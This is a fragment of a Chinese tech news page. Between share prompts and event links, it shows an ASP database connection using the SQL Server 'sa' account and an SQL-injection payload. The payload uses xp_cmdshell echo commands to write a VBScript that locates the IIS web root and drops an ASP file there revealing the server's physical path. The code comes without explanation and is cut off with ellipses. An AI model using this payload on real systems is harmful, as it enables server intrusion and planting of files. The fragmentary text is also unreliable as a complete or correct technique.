扫一扫
分享文章到微信
扫一扫
关注官方公众号
至顶头条
if request.form("xsxm")="" and request.form("xsxh")="" then Set Conn=Server.CreateObject("ADODB.Connection") Conn.Open "Driver={sql server};Server=localhost;Database=xxxx;UID=sa;PWD="&application("mm_xxx") |
.....xp_cmdshell ’echo set fso1=createobject("Scripting.filesystemobject")>c:\read.vbs’;-- .....xp_cmdshell ’echo Set WshShell = WScript.CreateObject("WScript.Shell")>>c:\read.vbs’;-- ..... -------------------read.vbs--------------------------------- set fso1=createobject("Scripting.filesystemobject") Set WshShell = WScript.CreateObject("WScript.Shell") spa=WshShell.Environment("process")("windir") set fil =fso1.opentextfile(spa & "\system32\aa.txt") do while not fil.atendofstream nr=fil.readline if left(nr,4)="Path" then pa=mid(nr,instr(nr,")")+3,len(nr)-instr(nr,")")-3) exit do end if loop set fil1 =fso1.opentextfile(pa&"\dd.asp",2,true) fil1.writeline "<%response.write request.servervariables(""APPL_PHYSICAL_PATH"")%>" ---------------cut here-------------------------------------- |
如果您非常迫切的想了解IT领域最新产品与技术信息,那么订阅至顶网技术邮件将是您的最佳途径之一。
现场直击|2021世界人工智能大会
直击5G创新地带,就在2021MWC上海
5G已至 转型当时——服务提供商如何把握转型的绝佳时机
寻找自己的Flag
华为开发者大会2020(Cloud)- 科技行者